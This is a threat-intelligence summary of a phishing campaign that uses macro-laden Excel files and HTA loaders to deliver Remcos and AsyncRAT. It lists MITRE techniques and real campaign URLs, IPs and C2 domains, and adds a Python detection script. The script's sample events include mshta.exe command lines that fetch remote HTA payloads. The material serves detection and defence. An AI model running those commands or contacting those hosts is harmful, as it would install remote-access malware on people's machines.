LevelBlue SpiderLabs tracked a global phishing campaign using malicious Excel attachments to deliver multi-stage payloads that ultimately deployed Remcos and AsyncRAT. The operators used heavy obfuscation, disposable infrastructure, and themed HTA filenames to hide activity across multiple industries and countries. #Remcos #AsyncRAT #CloudflareWorkers #workersdev
Key Points
- LevelBlue SpiderLabs observed an active phishing campaign distributing malicious Excel spreadsheet attachments over a two-week period.
- The campaign expanded from a limited phishing attempt into a widespread operation affecting organizations in manufacturing, media, professional services, agriculture, and chemicals.
- Victims were globally distributed across Europe, the Asia-Pacific region, and the Americas, with emails seen in English, Polish, Chinese, and Thai.
- The infection chain used multiple stages: malicious spreadsheet macro, HTA loader, script execution, and final payload delivery.
- The campaign delivered Remcos and AsyncRAT, and may also have distributed FormBook and Lumma.
- Attackers used obfuscation methods including URL shorteners, padded HTA files, Base64 encoding, PNG-embedded payloads, and Cloudflare Workers infrastructure.
- The operators used unusual positive-sounding HTA filenames and rotating infrastructure, suggesting automation and high-volume campaign generation.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Malicious emails delivered weaponized spreadsheet attachments to targeted staff (‘phishing emails deliver weaponized .xls files’).
- [T1204.002] User Execution: Malicious File – The victim had to open the spreadsheet and enable macros to start the infection chain (‘opens .xls attachment and enables macros’).
- [T1059.005] Command and Scripting Interpreter: Visual Basic – Embedded VBA in the Excel droppers fetched the HTA payload (‘Embedded VBA macros in .xls droppers fetch and launch the HTA second stage’).
- [T1218.005] System Binary Proxy Execution: Mshta – HTA files were executed through mshta.exe to run the next stage (‘HTA files executed via mshta.exe’).
- [T1059.007] Command and Scripting Interpreter: JavaScript – The HTA payload contained JavaScript used for staging and retrieving payloads (‘HTA payloads contain JavaScript responsible for staging and payload retrieval’).
- [T1102] Web Service – The attack used web services for geolocation lookup and staged content retrieval (‘query geoplugin[.]net for victim geolocation’).
- [T1071.001] Application Layer Protocol: Web Protocols – HTTP/HTTPS supported downloads, redirects, and C2 communication (‘HTTP/HTTPS used for HTA download, PNG stager retrieval, URL shortener redirects’).
- [T1027] Obfuscated Files or Information – The attackers concealed payloads using padding, Base64, decoy strings, and PNG steganography (‘PNG files used for steganography’).
- [T1497] Virtualization/Sandbox Evasion – The samples used environment checks and anti-analysis behavior (‘geolocation-based execution gating; long sleep intervals and anti-debug tags’).
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Remcos configurations enabled Run key persistence (‘enable HKCU and HKLM Run key persistence’).
- [T1056.001] Input Capture: Keylogging – Remcos and AsyncRAT were observed enabling keylogging (‘observed enabling keylogging’).
- [T1573] Encrypted Channel – Remcos C2 traffic was encrypted (‘RC4-encrypted communications with TLS certificate material’).
Indicators of Compromise
- [SHA256] Analyzed malicious spreadsheet attachment delivering AsyncRAT – 49c7b4eb6620917ee7ca796472b7af9f01ea6f7f80391ae7eb7bd8dabe0b7249
- [URL] URL shorteners used to redirect to HTA payloads – https://cuth[.]me/sse8kU, https://masuk[.]to/FdpxBG
- [URL] Obfuscated payload retrieval and hosted stages – https://as[.]al/file/KBn1RC, http://107.172.235[.]213/87/img_015059.png
- [URL] Remcos and AsyncRAT payload hosting – http://107.172.135[.]60/96/ibredgoodforbestthingscomingbackform.hta, http://198.12.83[.]75/98/img_194618.png
- [IP] Remcos C2 infrastructure – 173.231.188[.]244:14641, 192.227.219[.]79:4550
- [Domain] Remcos command-and-control domain – ffgfgjjddsgtrddhtjyfdsessxdssdfdfdfghfhg.duckdns[.]org:14647
- [Hostname] Cloudflare Workers hosts used for multiple payloads – icy-lab-0431.guilherme-telecomunicacoes2024.workers[.]dev, dawn-bush-ddd1.yasminanthonyy.workers[.]dev
- [Hostname] Additional Cloudflare Workers host observed in the campaign – small-morning-8be0.fsocietyandtools.workers[.]dev
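The following is an added example, not code from the LevelBlue SpiderLabs report. It turns the MITRE chain above (an Office process launching mshta.exe with a remote URL, T1204.002 into T1218.005) and the defanged indicator list into a small hunt over process-creation and network events. The indicator strings are the ones listed on this page; the log records, the Office parent-process list, and the `quiet-river-1234.example-account.workers.dev` host are constructed for illustration and are not from the campaign.

```python
"""Added example: hunt for Excel -> mshta.exe -> remote HTA and for the
campaign's hosting/C2 infrastructure. Sample events below are constructed."""
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Indicators copied from the IOC section above, still defanged as published.
DEFANGED_IOCS = [
    "https://cuth[.]me/sse8kU",
    "https://masuk[.]to/FdpxBG",
    "https://as[.]al/file/KBn1RC",
    "http://107.172.235[.]213/87/img_015059.png",
    "http://107.172.135[.]60/96/ibredgoodforbestthingscomingbackform.hta",
    "hxxp://198.12.83[.]75/98/img_194618.png",
    "173.231.188[.]244:14641",
    "192.227.219[.]79:4550",
    "ffgfgjjddsgtrddhtjyfdsessxdssdfdfdfghfhg.duckdns[.]org:14647",
    "icy-lab-0431.guilherme-telecomunicacoes2024.workers[.]dev",
    "dawn-bush-ddd1.yasminanthonyy.workers[.]dev",
    "small-morning-8be0.fsocietyandtools.workers[.]dev",
]

def refang(ioc: str) -> str:
    """Reverse the usual defanging so an indicator can be compared to live logs."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

def split_host_port(ioc: str):
    """Return (host, port-or-None) for a URL, a host:port pair, or a bare host."""
    s = refang(ioc)
    if "://" in s:
        u = urlparse(s)
        return (u.hostname or "").lower(), u.port
    host, sep, port = s.rpartition(":")
    if sep and port.isdigit():
        return host.lower(), int(port)
    return s.lower(), None

IOC_HOSTS = {split_host_port(i)[0] for i in DEFANGED_IOCS}
# The host:port entries are the C2 listeners; keep them as exact endpoints too.
C2_ENDPOINTS = {split_host_port(i) for i in DEFANGED_IOCS if "://" not in i and ":" in i}

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}  # assumed parent set
URL_IN_CMDLINE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# Throwaway hosting the campaign rotated through (Cloudflare Workers, DuckDNS).
DISPOSABLE_SUFFIXES = (".workers.dev", ".duckdns.org")

def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

@dataclass
class ProcessEvent:          # Sysmon-style process creation fields
    parent_image: str
    image: str
    command_line: str

@dataclass
class NetEvent:              # Sysmon-style network connection fields
    dest_host: str
    dest_port: int

def host_reasons(host: str, port=None) -> list:
    """Infrastructure checks shared by process URLs and network connections."""
    host = host.lower()
    reasons = []
    if port is not None and (host, port) in C2_ENDPOINTS:
        reasons.append(f"c2-endpoint:{host}:{port}")
    if host in IOC_HOSTS:
        reasons.append(f"known-ioc:{host}")
    elif host.endswith(DISPOSABLE_SUFFIXES):
        reasons.append(f"disposable-host:{host}")
    return reasons

def classify_process(ev: ProcessEvent) -> list:
    """Flag an Office parent spawning mshta.exe, then vet any URL on its command line."""
    reasons = []
    if _basename(ev.image) == "mshta.exe" and _basename(ev.parent_image) in OFFICE_PARENTS:
        reasons.append("office->mshta")
    for url in URL_IN_CMDLINE.findall(ev.command_line):
        u = urlparse(url)
        reasons.extend(host_reasons(u.hostname or "", u.port))
    return reasons

def classify_network(ev: NetEvent) -> list:
    return host_reasons(ev.dest_host, ev.dest_port)

# Constructed sample telemetry; only the indicator values are from the report.
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\mshta.exe", 'mshta.exe "https://cuth.me/sse8kU"'),
    ProcessEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 r"C:\Windows\System32\mshta.exe",
                 "mshta.exe https://quiet-river-1234.example-account.workers.dev/a.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 r"mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta"),  # local, benign
]
SAMPLE_NET_EVENTS = [
    NetEvent("173.231.188.244", 14641),
    NetEvent("dawn-bush-ddd1.yasminanthonyy.workers.dev", 443),
    NetEvent("intranet.example.com", 443),
]

def hunt(process_events, net_events):
    """Return (kind, subject, reasons) for every event that trips a check."""
    hits = []
    for ev in process_events:
        if reasons := classify_process(ev):
            hits.append(("process", ev.command_line, reasons))
    for ev in net_events:
        if reasons := classify_network(ev):
            hits.append(("network", f"{ev.dest_host}:{ev.dest_port}", reasons))
    return hits

if __name__ == "__main__":
    for kind, subject, reasons in hunt(SAMPLE_PROCESS_EVENTS, SAMPLE_NET_EVENTS):
        print(f"[{kind}] {subject} -> {', '.join(reasons)}")
```

The `office->mshta` check stands on its own and does not depend on the IOC list, which matters here because the report describes rotating, disposable infrastructure: the `workers.dev` and `duckdns.org` suffix match catches new hosts in the same families, while exact host and host:port matches cover the published indicators.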